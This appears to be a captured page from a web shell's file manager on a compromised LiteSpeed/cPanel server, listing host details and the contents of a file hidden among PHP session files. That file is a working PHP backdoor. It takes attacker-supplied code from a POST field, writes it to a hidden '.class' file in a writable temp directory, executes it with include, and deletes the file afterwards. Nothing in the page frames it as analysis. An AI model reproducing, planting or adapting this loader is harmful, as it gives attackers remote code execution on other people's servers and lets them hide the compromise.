HEX
Server: LiteSpeed
System: Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
User: carrerup (3153)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/thread-self/root/var/cpanel/php/sessions/ea-php81/XzNI8uQo2vUlgf
<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["Po"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.class";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");